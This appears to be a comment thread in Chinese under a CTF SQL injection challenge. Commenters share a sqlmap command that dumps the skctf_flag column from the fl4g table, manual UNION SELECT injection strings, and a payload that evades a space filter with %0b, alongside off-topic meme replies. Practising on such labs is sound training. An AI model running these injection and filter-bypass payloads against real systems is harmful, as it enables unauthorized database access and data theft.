利用”不显示“代表”报错“
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
fl4g 是db,然后找table,在找cloumns,最后dump
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了
1' and 1=2 union select 1,2,3,skctf_flag from fl4g#
http://t.csdn.cn/GCIkY
一个sqlmap就能完美解决
鸡你太美
哎呦你干嘛
小黑子,哥哥下的蛋你别吃
小黑子
id=-1' union select 1,2,3,skctf_flag from fl4g#
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
输入框的sql注入
...
评论
xiaoxhw 1年前
举报
利用”不显示“代表”报错“
笨笨笨蛋 1年前
举报
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
aWxvdmVjdGY 1年前
举报
fl4g 是db,然后找table,在找cloumns,最后dump
教练我要打亚索 1年前
举报
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
笨笨笨蛋 1年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 1年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 1年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 1年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了
秋刀鱼の丸 1年前
举报
1' and 1=2 union select 1,2,3,skctf_flag from fl4g#
jiangyou 1年前
举报
http://t.csdn.cn/GCIkY
Hobin 1年前
举报
一个sqlmap就能完美解决
MONSTEinCAT 1年前
举报
鸡你太美
阿厂 1年前
举报
哎呦你干嘛
肥肠粉 1年前
举报
小黑子,哥哥下的蛋你别吃
Sauexceed 1年前
举报
小黑子
yemur 1年前
举报
id=-1' union select 1,2,3,skctf_flag from fl4g#
lysandria 1年前
举报
过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#
15338641414 1年前
举报
输入框的sql注入